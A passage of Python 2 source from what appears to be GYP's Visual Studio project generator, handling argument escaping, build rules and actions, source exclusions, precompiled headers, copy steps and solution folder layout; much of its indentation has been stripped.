  cmd = _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell=True,
                                    fix_paths=True, has_input_path=False,
                                    quote_cmd=True)
# Insert makefile as 0'th input, so it gets the action attached there,
# as this is easier to understand from in the IDE.
all_inputs = list(all_inputs)
all_inputs.insert(0, filename)
  # _AddActionStep keys actions by configuration, so register the makefile
  # action for every configuration (assumption: external rules apply to all).
  for config in spec['configurations']:
    _AddActionStep(actions_to_add,
                   inputs=_FixPaths(all_inputs),
                   outputs=_FixPaths(all_outputs),
                   description='Running %s' % cmd,
                   command=cmd,
                   config=config)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
"""Escapes a Windows command-line argument.
So that the Win32 CommandLineToArgv function will turn the escaped result back
into the original string.
See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
("Parsing C++ Command-Line Arguments") to understand why we have to do
this.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a literal quote, CommandLineToArgv requires an odd number of
# backslashes preceding it, and it produces half as many literal backslashes
# (rounded down). So we need to produce 2n+1 backslashes.
return 2 * match.group(1) + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex.sub(_Replace, s)
# Now add unescaped quotes so that any whitespace is interpreted literally.
s = '"' + s + '"'
return s
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
"""Escapes command line arguments for MSVS.
The VCProj format stores string lists in a single string using commas and
semi-colons as separators, which must be quoted if they are to be
interpreted literally. However, command-line arguments may already have
quotes, and the VCProj parser is ignorant of the backslash escaping
convention used by CommandLineToArgv, so the command-line quotes and the
VCProj quotes may not be the same quotes. So to store a general
command-line argument in a VCProj list, we need to parse the existing
quoting according to VCProj's convention and quote any delimiters that are
not already quoted by that convention. The quotes that we add will also be
seen by CommandLineToArgv, so if backslashes precede them then we also have
to escape those backslashes according to the CommandLineToArgv
convention.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a non-literal quote, CommandLineToArgv requires an even number of
# backslashes preceding it, and it produces half as many literal
# backslashes. So we need to produce 2n backslashes.
return 2 * match.group(1) + '"' + match.group(2) + '"'
segments = s.split('"')
# The unquoted segments are at the even-numbered indices.
for i in range(0, len(segments), 2):
segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
# Concatenate back into a single string
s = '"'.join(segments)
if len(segments) % 2 == 0:
# String ends while still quoted according to VCProj's convention. This
# means the delimiter and the next list item that follow this one in the
# .vcproj file will be misinterpreted as part of this item. There is nothing
# we can do about this. Adding an extra quote would correct the problem in
# the VCProj but cause the same problem on the final command-line. Moving
    # the item to the end of the list does work, but that's only possible if
# there's only one such item. Let's just warn the user.
print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
'quotes in ' + s)
return s
def _EscapeCppDefineForMSVS(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSVS(s)
s = _EscapeVCProjCommandLineArgListItem(s)
return s
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
"""Escapes a Windows command-line argument for use by MSBuild."""
def _Replace(match):
return (len(match.group(1))/2*4)*'\\' + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex2.sub(_Replace, s)
return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
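  # For example (illustrative): '%(Filename)$(Var)' -> '%25(Filename)%24(Var)'.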
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSBuild(s)
s = _EscapeMSBuildSpecialCharacters(s)
return s
def _GenerateRulesForMSVS(p, output_dir, options, spec,
sources, excluded_sources,
actions_to_add):
"""Generate all the rules for a particular project.
Arguments:
p: the project
output_dir: directory to emit rules to
options: global options passed to the generator
spec: the specification for this project
sources: the set of all known source files in this project
excluded_sources: the set of sources excluded from normal processing
actions_to_add: deferred list of actions to add in
"""
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
# Handle rules that use a native rules file.
if rules_native:
_GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)
# Handle external rules (non-native rules).
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(rules, sources, excluded_sources)
def _AdjustSourcesForRules(rules, sources, excluded_sources):
# Add outputs generated by each rule (if applicable).
for rule in rules:
    # Only add a rule's outputs when it asks to process them as sources.
if int(rule.get('process_outputs_as_sources', False)):
# Add in the outputs from this rule.
trigger_files = _FindRuleTriggerFiles(rule, sources)
for trigger_file in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
inputs = set(_FixPaths(inputs))
outputs = set(_FixPaths(outputs))
inputs.remove(_FixPath(trigger_file))
sources.update(inputs)
excluded_sources.update(inputs)
sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
"""Take inputs with actions attached out of the list of exclusions.
Arguments:
excluded_sources: list of source files not to be built.
actions_to_add: dict of actions keyed on source file they're attached to.
Returns:
excluded_sources with files that have actions attached removed.
"""
must_keep = []
for conf in actions_to_add:
#print "_FilterActionsFromExcluded, config %s" % conf
must_keep +=_FixPaths(actions_to_add[conf].keys())
return [s for s in excluded_sources if s not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
"""Get the guid for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
Returns:
the guid.
Raises:
ValueError: if the specified GUID is invalid.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
# Decide the guid of the project.
guid = default_config.get('msvs_guid')
if guid:
if VALID_MSVS_GUID_CHARS.match(guid) is None:
raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
(guid, VALID_MSVS_GUID_CHARS.pattern))
guid = '{%s}' % guid
guid = guid or MSVSNew.MakeGuid(proj_path)
return guid
def _GenerateProject(project, options, version):
"""Generates a vcproj file.
Arguments:
project: the MSVSProject object.
options: global generator options.
version: the MSVSVersion object.
"""
default_config = _GetDefaultConfiguration(project.spec)
# Skip emitting anything if told to with msvs_existing_vcproj option.
if default_config.get('msvs_existing_vcproj'):
return
if version.UsesVcxproj():
_GenerateMSBuildProject(project, options, version)
else:
_GenerateMSVSProject(project, options, version)
def _GenerateMSVSProject(project, options, version):
"""Generates a .vcproj file. It may create .rules and .user files too.
Arguments:
project: The project object we will generate the file for.
options: Global options passed to the generator.
version: The VisualStudioVersion object.
"""
spec = project.spec
configurations = spec['configurations']
vcproj_dir = os.path.dirname(project.path)
if vcproj_dir and not os.path.exists(vcproj_dir):
os.makedirs(vcproj_dir)
platforms = _GetUniquePlatforms(spec)
p = MSVSProject.Writer(project.path, version, spec['target_name'],
project.guid, platforms)
# Get directory project file is in.
project_dir = os.path.split(project.path)[0]
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
config_type = _GetMSVSConfigurationType(spec, project.build_file)
for config_name, config in configurations.iteritems():
_AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)
# Prepare list of sources and excluded sources.
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, gyp_file)
# Add rules.
actions_to_add = {}
for conf in configurations:
actions_to_add[conf] = {}
_GenerateRulesForMSVS(p, project_dir, options, spec,
sources, excluded_sources,
actions_to_add)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(
spec, options, project_dir, sources, excluded_sources))
#print "_GenerateMSVSProject: sources: %s" % sources
# Add in files.
_VerifySourcesExist(sources, project_dir)
p.AddFiles(sources)
_AddToolFilesToMSVS(p, spec)
_HandlePreCompiledHeaders(p, sources, spec)
for conf in configurations:
_AddActions(actions_to_add, spec, relative_path_of_gyp_file, conf)
_AddCopies(actions_to_add, spec)
_WriteMSVSUserFile(project.path, version, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
_ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl)
_AddAccumulatedActionsToMSVS(p, spec, actions_to_add)
# Write it out.
p.WriteIfChanged()
def _GetUniquePlatforms(spec):
"""Returns the list of unique platforms for this spec, e.g ['win32', ...].
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
    The list of unique platform names.
"""
# Gather list of unique platforms.
platforms = set()
for configuration in spec['configurations']:
platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
platforms = list(platforms)
return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
"""Generates a .user file for the user running this Gyp program.
Arguments:
proj_path: The path of the project file being created. The .user file
shares the same path (with an appropriate suffix).
version: The VisualStudioVersion object.
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
(domain, username) = _GetDomainAndUserName()
vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
user_file = MSVSUserFile.Writer(vcuser_filename, version,
spec['target_name'])
return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
'dummy_executable': '1', # .exe
}[spec['type']]
except KeyError:
if spec.get('type'):
raise Exception('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise Exception('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
"""Adds a configuration to the MSVS project.
  Many settings in a vcproj file are specific to a configuration. This
  function adds the main part of the vcproj file that is configuration
  specific.
Arguments:
p: The target project being generated.
spec: The target dictionary containing the properties of the target.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
    config: The dictionary that defines the special processing to be done
for this configuration.
"""
# Get the information for this configuration
include_dirs, resource_include_dirs = _GetIncludeDirs(config)
libraries = _GetLibraries(spec)
out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec)
defines = _GetDefines(config)
defines = [_EscapeCppDefineForMSVS(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(config)
prebuild = config.get('msvs_prebuild')
postbuild = config.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = config.get('msvs_precompiled_header')
# Prepare the list of tools as a dictionary.
tools = dict()
# Add in user specified msvs_settings.
msvs_settings = config.get('msvs_settings', {})
MSVSSettings.ValidateMSVSSettings(msvs_settings)
for tool in msvs_settings:
settings = config['msvs_settings'][tool]
for setting in settings:
_ToolAppend(tools, tool, setting, settings[setting])
# Add the information to the appropriate tool
_ToolAppend(tools, 'VCCLCompilerTool',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(tools, 'VCResourceCompilerTool',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
if out_file:
_ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
# Add defines.
_ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
_ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
defines)
# Change program database directory to prevent collisions.
_ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
'$(IntDir)\\$(ProjectName)\\vc80.pdb', only_if_unset=True)
# Add disabled warnings.
_ToolAppend(tools, 'VCCLCompilerTool',
'DisableSpecificWarnings', disabled_warnings)
# Add Pre-build.
_ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
# Add Post-build.
_ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
_ToolAppend(tools, 'VCCLCompilerTool',
'PrecompiledHeaderThrough', precompiled_header)
_ToolAppend(tools, 'VCCLCompilerTool',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)
_AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
"""Returns the list of directories to be used for #include directives.
Arguments:
    config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
# TODO(bradnelson): include_dirs should really be flexible enough not to
# require this sort of thing.
include_dirs = (
config.get('include_dirs', []) +
config.get('msvs_system_include_dirs', []))
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
include_dirs = _FixPaths(include_dirs)
resource_include_dirs = _FixPaths(resource_include_dirs)
return include_dirs, resource_include_dirs
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
    The list of libraries.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
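  # For example (illustrative):
  #   ['-lfoo.lib', 'bar.lib', 'foo.lib'] -> ['bar.lib', 'foo.lib']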
found = set()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
def _GetOutputFilePathAndTool(spec):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.dll'),
# TODO(jeanluc) If we want to avoid the MSB8012 warnings in
# VisualStudio 2010, we will have to change the value of $(OutDir)
# to contain the \lib suffix, rather than doing it as below.
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)\\lib\\', '.lib'),
'dummy_executable': ('VCLinkerTool', 'Link', '$(IntDir)\\', '.junk'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionnary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
"""Convert tools to a form expected by Visual Studio.
Arguments:
    tools: A dictionary of settings; the tool name is the key.
Returns:
A list of Tool objects.
"""
tool_list = []
for tool, settings in tools.iteritems():
# Collapse settings with lists.
settings_fixed = {}
for setting, value in settings.iteritems():
if type(value) == list:
if ((tool == 'VCLinkerTool' and
setting == 'AdditionalDependencies') or
setting == 'AdditionalOptions'):
settings_fixed[setting] = ' '.join(value)
else:
settings_fixed[setting] = ';'.join(value)
else:
settings_fixed[setting] = value
# Add in this tool.
tool_list.append(MSVSProject.Tool(tool, settings_fixed))
return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
"""Add to the project file the configuration specified by config.
Arguments:
p: The target project being generated.
spec: the target project dict.
    tools: A dictionary of settings; the tool name is the key.
    config: The dictionary that defines the special processing to be done
for this configuration.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
"""
attributes = _GetMSVSAttributes(spec, config, config_type)
# Add in this configuration.
tool_list = _ConvertToolsToExpectedForm(tools)
p.AddConfig(_ConfigFullName(config_name, config),
attrs=attributes, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
# Prepare configuration attributes.
prepared_attrs = {}
source_attrs = config.get('msvs_configuration_attributes', {})
for a in source_attrs:
prepared_attrs[a] = source_attrs[a]
# Add props files.
vsprops_dirs = config.get('msvs_props', [])
vsprops_dirs = _FixPaths(vsprops_dirs)
if vsprops_dirs:
prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
# Set configuration type.
prepared_attrs['ConfigurationType'] = config_type
output_dir = prepared_attrs.get('OutputDirectory',
'$(SolutionDir)$(ConfigurationName)')
# TODO(jeanluc) If we want to avoid the MSB8012 warning, we should
# add code like the following to place libraries in their own directory.
# if config_type == '4':
# output_dir = spec.get('product_dir', output_dir + '\\lib')
prepared_attrs['OutputDirectory'] = output_dir
if 'IntermediateDirectory' not in prepared_attrs:
intermediate = '$(ConfigurationName)\\obj\\$(ProjectName)'
prepared_attrs['IntermediateDirectory'] = intermediate
return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
sources = [_NormalizedSource(s) for s in sources_array]
sources_set.update(set(sources))
def _PrepareListOfSources(spec, gyp_file):
"""Prepare list of sources and excluded sources.
Besides the sources specified directly in the spec, adds the gyp file so
that a change to it will cause a re-compile. Also adds appropriate sources
for actions and copies. Assumes later stage will un-exclude files which
have custom build steps attached.
Arguments:
spec: The target dictionary containing the properties of the target.
gyp_file: The name of the gyp file.
Returns:
    A pair of (set of sources, set of excluded sources).
The sources will be relative to the gyp file.
"""
sources = set()
_AddNormalizedSources(sources, spec.get('sources', []))
excluded_sources = set()
# Add in the gyp file.
sources.add(gyp_file)
# Add in 'action' inputs and outputs.
for a in spec.get('actions', []):
inputs = a.get('inputs', [])
inputs = [_NormalizedSource(i) for i in inputs]
# Add all inputs to sources and excluded sources.
inputs = set(inputs)
sources.update(inputs)
excluded_sources.update(inputs)
if int(a.get('process_outputs_as_sources', False)):
_AddNormalizedSources(sources, a.get('outputs', []))
# Add in 'copies' inputs and outputs.
for cpy in spec.get('copies', []):
_AddNormalizedSources(sources, cpy.get('files', []))
return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
spec, options, gyp_dir, sources, excluded_sources):
"""Adjusts the list of sources and excluded sources.
Also converts the sets to lists.
Arguments:
spec: The target dictionary containing the properties of the target.
options: Global generator options.
gyp_dir: The path to the gyp file being processed.
sources: A set of sources to be included for this project.
excluded_sources: A set of sources to be excluded for this project.
Returns:
A trio of (list of sources, list of excluded sources,
               list of excluded IDL files)
"""
# Exclude excluded sources coming into the generator.
excluded_sources.update(set(spec.get('sources_excluded', [])))
# Add excluded sources into sources for good measure.
sources.update(excluded_sources)
# Convert to proper windows form.
# NOTE: sources goes from being a set to a list here.
# NOTE: excluded_sources goes from being a set to a list here.
sources = _FixPaths(sources)
# Convert to proper windows form.
excluded_sources = _FixPaths(excluded_sources)
excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
precompiled_related = _GetPrecompileRelatedFiles(spec)
# Find the excluded ones, minus the precompiled header related ones.
fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
# Convert to folders and the right slashes.
sources = [i.split('\\') for i in sources]
# Remove the first N layers of hierarchy from paths that are deep enough
layers_to_remove = int(spec.get('msvs_strip_hierarchy', 2))
#print "Remove %d layers" % layers_to_remove
sources = _ConvertSourcesToFilterHierarchy(sources,
excluded=fully_excluded,
layers_to_strip=layers_to_remove)
# Add in dummy file for type none.
if spec['type'] == 'dummy_executable':
# Pull in a dummy main so it can link successfully.
dummy_relpath = gyp.common.RelativePath(
options.depth + '\\tools\\gyp\\gyp_dummy.c', gyp_dir)
sources.append(dummy_relpath)
return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
# Gather a list of precompiled header related sources.
precompiled_related = []
for _, config in spec['configurations'].iteritems():
for k in precomp_keys:
f = config.get(k)
if f:
precompiled_related.append(_FixPath(f))
return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl):
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
for file_name, excluded_configs in exclusions.iteritems():
for config_name, config in excluded_configs:
p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
{'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
exclusions = {}
# Exclude excluded sources from being built.
for f in excluded_sources:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
# Don't do this for ones that are precompiled header related.
if f not in precomped:
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
# If any non-native rules use 'idl' as an extension exclude idl files.
# Exclude them now.
for f in excluded_idl:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
return exclusions
def _AddToolFilesToMSVS(p, spec):
# Add in tool files (rules).
tool_files = set()
for _, config in spec['configurations'].iteritems():
for f in config.get('msvs_tool_files', []):
tool_files.add(f)
for f in tool_files:
p.AddToolFile(f)
def _HandlePreCompiledHeaders(p, sources, spec):
# Pre-compiled header source stubs need a different compiler flag
# (generate precompiled header) and any source file not of the same
# kind (i.e. C vs. C++) as the precompiled header source stub needs
# to have use of precompiled headers disabled.
extensions_excluded_from_precompile = []
for config_name, config in spec['configurations'].iteritems():
source = config.get('msvs_precompiled_source')
if source:
source = _FixPath(source)
      # UsePrecompiledHeader=1 means this stub creates the precompiled header.
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '1'})
p.AddFileConfig(source, _ConfigFullName(config_name, config),
{}, tools=[tool])
basename, extension = os.path.splitext(source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
def DisableForSourceTree(source_tree):
for source in source_tree:
if isinstance(source, MSVSProject.Filter):
DisableForSourceTree(source.contents)
else:
basename, extension = os.path.splitext(source)
if extension in extensions_excluded_from_precompile:
for config_name, config in spec['configurations'].iteritems():
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '0',
'ForcedIncludeFiles': '$(NOINHERIT)'})
p.AddFileConfig(_FixPath(source),
_ConfigFullName(config_name, config),
{}, tools=[tool])
# Do nothing if there was no precompiled source.
if extensions_excluded_from_precompile:
DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file, conf):
# Add actions.
actions = spec.get('actions', [])
for a in actions:
cmd = _BuildCommandLineForRule(spec, a, has_input_path=False)
# Attach actions to the gyp file if nothing else is there.
inputs = a.get('inputs') or [relative_path_of_gyp_file]
# Add the action.
_AddActionStep(actions_to_add,
inputs=inputs,
outputs=a.get('outputs', []),
description=a.get('message', a['action_name']),
command=cmd,
config=conf)
def _WriteMSVSUserFile(project_path, version, spec):
# Add run_as and test targets.
if 'run_as' in spec:
run_as = spec['run_as']
action = run_as.get('action', [])
environment = run_as.get('environment', [])
working_directory = run_as.get('working_directory', '.')
elif int(spec.get('test', 0)):
action = ['$(TargetPath)', '--gtest_print_time']
environment = []
working_directory = '.'
else:
return # Nothing to add
# Write out the user file.
print "USER FILE"
user_file = _CreateMSVSUserFile(project_path, version, spec)
for config_name, c_data in spec['configurations'].iteritems():
user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
action, environment, working_directory)
user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
copies = _GetCopies(spec)
for inputs, outputs, cmd, description in copies:
print "!! COPY ..."
_AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
description=description, command=cmd)
def _GetCopies(spec):
copies = []
# Add copies.
for cpy in spec.get('copies', []):
for src in cpy.get('files', []):
dst = os.path.join(cpy['destination'], os.path.basename(src))
# _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
# outputs, so do the same for our generated command line.
if src.endswith('/'):
src_bare = src[:-1]
base_dir = posixpath.split(src_bare)[0]
outer_dir = posixpath.split(src_bare)[1]
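        # xcopy /e copies the directory tree (including empty directories),
        # /f prints full source/destination names, /y suppresses overwrite
        # prompts.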
cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
_FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
copies.append(([src], ['dummy_copies', dst], cmd,
'Copying %s to %s' % (src, dst)))
else:
cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
_FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
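  # For example, a path of 'foo/bar' returns root['foo']['bar'], creating the
  # intermediate dicts along the way.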
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
# Convert to folders recursively.
children = []
for folder, contents in bucket.iteritems():
if type(contents) == dict:
folder_children = _DictsToFolders(os.path.join(base_path, folder),
contents, flat)
if flat:
children += folder_children
else:
folder_children = MSVSNew.MSVSFolder(os.path.join(base_path, folder),
name='(' + folder + ')',
entries=folder_children)
children.append(folder_children)
else:
children.append(contents)
return children
def _CollapseSingles(parent, node):
  # Recursively explore the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
root = {}
# Convert into a tree of dicts on path.
for p in sln_projects:
gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
gyp_dir = os.path.dirname(gyp_file)
path_dict = _GetPathDict(root, gyp_dir)
path_dict[target + '.vcproj'] = project_objects[p]
# Walk down from the top until we hit a folder that has more than one entry.
# In practice, this strips the top-level "src/" dir from the hierarchy in
# the solution.
while len(root) == 1 and type(root[root.keys()[0]]) == dict:
root = root[root.keys()[0]]
# Collapse singles.
root = _CollapseSingles('', root)
# Merge buckets until everything is a root entry.
return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
default_config = _GetDefaultConfiguration(spec)
proj_filename = default_config.get('msvs_existing_vcproj')
if not proj_filename:
proj_filename = (spec['target_name'] + options.suffix +
msvs_version.ProjectExtension())
build_file = gyp.common.BuildFile(qualified_target)
proj_path = os.path.join(os.path.split(build_file)[0], proj_filename)
fix_prefix = None
if options.generator_output:
project_dir_path = os.path.dirname(os.path.abspath(proj_path))
proj_path = os.path.join(options.generator_output, proj_path)
fix_prefix = gyp.common.RelativePath(project_dir_path,
os.path.dirname(proj_path))
return proj_path, fix_prefix
def _GetPlatformOverridesOfProject(spec):
# Prepare a dict indicating which project configurations are used for which
# solution configurations for this target.
config_platform_overrides = {}
for config_name, c in spec['configurations'].iteritems():
config_fullname = _ConfigFullName(config_name, c)
platform = c.get('msvs_target_platform', _ConfigPlatform(c))
fixed_config_fullname = '%s|%s' % (
_ConfigBaseName(config_name, _ConfigPlatform(c)), platform)
